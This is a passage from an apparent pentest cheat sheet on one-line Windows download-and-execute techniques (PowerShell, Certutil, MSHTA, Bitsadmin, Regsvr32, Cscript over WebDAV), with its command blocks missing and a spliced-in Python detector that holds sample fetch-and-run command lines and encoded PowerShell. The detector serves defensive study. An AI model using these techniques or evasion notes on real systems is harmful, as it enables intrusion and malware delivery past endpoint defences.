Pentest One Liners

Single-line commands to download and execute malicious code are useful for a number of reasons:

  • To exploit web application vulnerabilities, such as shell command injection
  • When you have the ability to execute commands, but not directly copy files (via WMI for instance)
  • To embed in other attack packages, such as macro-based malware or USB HID attacks

Having multiple techniques is useful, as endpoint detection and response systems will typically use pattern matching rules to detect some of these.
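As an added defender-side example (not part of the original cheat sheet), the script below applies the kind of pattern-matching rules the sentence above refers to: it walks constructed process-creation records with Sysmon-style `Image` and `CommandLine` fields and flags the living-off-the-land binaries named on this page when they are launched with a remote resource (an http(s) URL or a UNC/WebDAV path) on their command line, or when PowerShell is launched with an encoded command. The rule names, the binary list and the sample command lines are assumptions chosen for illustration.

```python
"""Added detection example; not code from the original page.

Flags process-creation events where a living-off-the-land binary named on
this page is started with a remote location in its command line, or where
PowerShell is started with an encoded command. Event records are constructed
to resemble Sysmon Event ID 1 fields (Image, CommandLine).
"""
import re
from dataclasses import dataclass

# Binaries the page lists as download-and-execute vehicles (assumed list).
LOLBINS = {
    "certutil.exe", "mshta.exe", "wmic.exe", "bitsadmin.exe",
    "rundll32.exe", "regsvr32.exe", "cscript.exe", "wscript.exe",
    "powershell.exe", "pwsh.exe",
}

# http(s) URL, or a UNC path such as \\host\share or the WebDAV form \\host@80\share
REMOTE_RE = re.compile(r"(https?://|\\\\[\w.-]+(@\d+)?\\)", re.IGNORECASE)

# -EncodedCommand and its short forms followed by a base64 blob of 20+ characters
ENCODED_RE = re.compile(
    r"(^|\s)[-/](encodedcommand|enc|en|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE
)


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: dict) -> list:
    """Return the findings for one process-creation record (empty if benign)."""
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    findings = []
    if image not in LOLBINS:
        return findings
    if REMOTE_RE.search(cmd):
        findings.append(Finding("lolbin_remote_resource", image, cmd))
    if image in ("powershell.exe", "pwsh.exe") and ENCODED_RE.search(cmd):
        findings.append(Finding("powershell_encoded_command", image, cmd))
    return findings


def scan(events: list) -> list:
    """Run detect() over a list of records and concatenate the findings."""
    out = []
    for event in events:
        out.extend(detect(event))
    return out


# Constructed sample records; 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -dump C:\certs\corp.cer"},          # benign
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://192.0.2.10/a.txt C:\Users\Public\a.txt"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://192.0.2.10/index.hta"},
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe \\192.0.2.10@80\share\run.vbs"},       # WebDAV UNC path
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -enc ZQBjAGgAbwAgAGgAaQA="},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},       # benign
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},                           # not a LOLBin
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:28} {f.image:16} {f.command_line}")
```

The rules deliberately key on the binary name plus the presence of a remote location rather than on exact switch spellings, which is why the page can say that having several techniques helps: renaming a switch or changing the fetch method defeats a narrow signature, while a rule that asks "why is certutil or mshta talking to a URL at all" is harder to sidestep.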

PowerShell

Very likely to be detected by EDR solutions.

Proxy Aware Version

Base64 Encoded

Payload Generation

To base64 encode PowerShell scripts, use:

Certutil

Windows Defender picks up on this technique.

MSHTA

WMIC

Windows Defender picks up on this technique.

Payload Generation

Stylesheet to load calc.exe:

Bitsadmin

If you get an error like 0x80070057, this may be because the output path is incorrectly specified, or isn’t writable.

Rundll32

Payload Generation

Regsvr32

Windows Defender picks up on this technique.

Payload Generation

Contents of test.html:

Cscript

This requires reading a file from a WebDav share:

WebDav Share Configuration in Kali

Edit Apache Config File

/etc/apache2/sites-available/000-default.conf

Add to top of file:

Add to VirtualHost section:

Testing

Generate VBS Meterpreter